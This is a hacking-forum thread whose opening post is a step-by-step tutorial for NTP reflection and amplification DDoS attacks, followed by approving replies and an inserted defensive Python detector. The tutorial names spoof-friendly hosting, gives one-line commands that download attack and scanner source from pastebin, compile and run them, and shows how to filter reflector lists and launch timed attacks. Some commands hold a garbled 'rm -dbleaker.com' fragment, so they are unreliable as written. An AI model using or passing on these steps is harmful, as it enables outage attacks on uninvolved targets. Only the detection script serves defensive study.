

1.0 Introduction to DrDoS
Distributed Reflection Denial of Service, also known as DrDoS, has been used for years to create some of the world's largest DDoS attacks! Over the past 5-6 years it has gotten so easy that now anyone can do it with just $10 and some simple knowledge of the Linux OS. Many people use DrDoS in combination with botnets; controlling mass quantities of bots that are able to launch a reflected attack can be overpowering to some. DrDoS is often used in DDoS-for-hire sites.

Reflection takes advantage of UDP services. UDP, by design, is a connectionless internet protocol in which the receiver does not fully validate the IPv4 address of the source. This lack of validation makes it possible for someone to pretend to be you! Since it seems like the packets are coming from the target's IP, typically it will send all requests back to said IP. This serves 2 purposes of the attack: the attacker can hide his identity and amplify the attacks greatly.
1.1 Types of Amplification Vectors
In the past there was only DNS amplification, until people started experimenting with other UDP-based protocols. Each protocol has a different Bandwidth Amplification Factor, meaning one method might amplify 100Mbps -> 5000Mbps while another might give you this result: 100Mbps -> 1000Mbps.
Here is but a short list of protocols you can abuse:
  • Quote of the Day
  • Teamspeak 3
  • Quake Network Protocol
2.0 Launching a DrDoS Attack
This tutorial is focused around the NTP attack vector.
[Image: Abusing+Network+Time+Protocol+(NTP)+to+p...attack.jpg]

Here is what you will need for this:
  • Common Sense
  • Spoofed Dedicated Server with Ubuntu 14.04 64bit Installed
  • Server for reflector scanning
Here is a host that allows IP Header Modification (Spoofing):


1.) First you need to set up your attacking server. You can log in using an SSH client called PuTTY.
[Image: bb874f939b38428bafad5e30cf8d2da4.png]

2.) You will need to install the dependencies for you to run the attack script
apt-get install gcc wget

3.) Now install the NTP Attack Script:
wget -q http://pastebin.com/raw/fcyCGWqw -O ntp.c; gcc -o ntp ntp.c -pthread; rm -dbleaker.com ntp.c; ./ntp

4.) Here is where you log in to your scanning server and run these commands:
apt-get install gcc wget -y; wget -q http://pastebin.com/raw/XWFfm5hh -O ntpscan.c; gcc -o ntpscan ntpscan.c -pthread; rm -dbleaker.com ntpscan.c; ./ntpscan
Example for scanning: ./ntpscan ntp.txt 3 5

Should look something like this:
[Image: 94f2696d150f40e0acb745ac95343ecc.png]
5.) Filtering your reflection lists:

You will often get multiple IPs in one list. This sorts out any duplicate IPs:
cat scanned.txt | sort -u > unique.txt

Sorts IPs over a certain response size (ex: 300):
cat scannedlist.txt |awk '{if($2>300)print $1}' | sort -u > output.txt
6.) Now log back into your attacking server and upload your new filtered reflection list of NTP servers, and use this command to start an attack. Time is in seconds.

Usage: ./ntp [IP] [file] [threads] [limiter] [time]
Ex: ./ntp ntp.txt 1 -1 300

7.) Here are some results of the successful amplification against another target:
[Image: 14af945bb98749e9a0e65765ddd1594e.png]

[-] The following 4 users Like LucasYegorov's post:
  • AFG, Devil, DStar, Wubz
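A defender's view of the reflection pattern described in the first post, as an added example that is not part of the original thread: it flags hosts that receive large, unsolicited UDP traffic from source port 123 sent by many distinct hosts. The flow tuple layout, the thresholds and the sample records are assumptions constructed for illustration.

```python
from collections import defaultdict

NTP_PORT = 123
MIN_SOURCES = 3          # assumed threshold: distinct unsolicited senders
MIN_AVG_PKT_BYTES = 200  # assumed: normal NTP time replies carry a 48-byte payload

# Constructed flow records (documentation addresses, not real traffic):
# (src_ip, src_port, dst_ip, dst_port, proto, packets, bytes)
SAMPLE_FLOWS = [
    # 203.0.113.5 receives large port-123 replies it never asked for
    ("198.51.100.10", 123, "203.0.113.5", 40211, "udp", 500, 234000),
    ("198.51.100.11", 123, "203.0.113.5", 40211, "udp", 450, 210600),
    ("198.51.100.12", 123, "203.0.113.5", 40211, "udp", 600, 280800),
    # 203.0.113.9 does a normal time sync: request out, small reply back
    ("203.0.113.9", 51000, "198.51.100.10", 123, "udp", 1, 76),
    ("198.51.100.10", 123, "203.0.113.9", 51000, "udp", 1, 76),
    # unrelated TCP traffic is ignored
    ("198.51.100.50", 443, "203.0.113.5", 52000, "tcp", 20, 18000),
]

def find_ntp_reflection_victims(flows, min_sources=MIN_SOURCES,
                                min_avg=MIN_AVG_PKT_BYTES):
    """Return {victim_ip: summary} for hosts hit by unsolicited NTP replies."""
    # (client, server) pairs where the client itself sent an NTP request.
    # A spoofed request never appears here: it was sent by someone else.
    solicited = {(src, dst) for src, _, dst, dport, proto, _, _ in flows
                 if proto == "udp" and dport == NTP_PORT}
    stats = defaultdict(lambda: {"sources": set(), "packets": 0, "bytes": 0})
    for src, sport, dst, _, proto, pkts, nbytes in flows:
        if proto != "udp" or sport != NTP_PORT:
            continue
        if (dst, src) in solicited:
            continue  # legitimate reply to a request this host made
        entry = stats[dst]
        entry["sources"].add(src)
        entry["packets"] += pkts
        entry["bytes"] += nbytes
    alerts = {}
    for dst, e in stats.items():
        avg = e["bytes"] / max(e["packets"], 1)
        if len(e["sources"]) >= min_sources and avg >= min_avg:
            alerts[dst] = {"reflectors": len(e["sources"]),
                           "avg_pkt_bytes": round(avg),
                           "total_bytes": e["bytes"]}
    return alerts

if __name__ == "__main__":
    for victim, summary in find_ntp_reflection_victims(SAMPLE_FLOWS).items():
        print(victim, summary)
```
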
Very nice thread! Smile

Great tutorial, well written and in depth. Hopefully I can be a l33t hax0r now.

(10-10-2016, 04:45 AM)AFG Wrote: Very nice thread! Smile

Thank you Smile!

(10-10-2016, 04:45 AM)Axe Wrote: Great tutorial, well written and in depth. Hopefully I can be a l33t hax0r now.

AnYoNe CaN HaKK tHe FuCkInG PlAnEt NoW

Great tutorial.

If you need help with anything or want to ask a question, PM me.
Well constructed tutorial thank you OP Heart

Got me some reading to do Big Grin
[-] The following 1 user Likes Devil's post:
  • LucasYegorov
Nice tutorial hax god. YusHeart

This is actually a dope tutorial, thank you for sharing man. This will help a lot. Heart

Awesome documentary, thanks bro.
Will the hoster frist herberg suspend servers for outgoing DDoS?
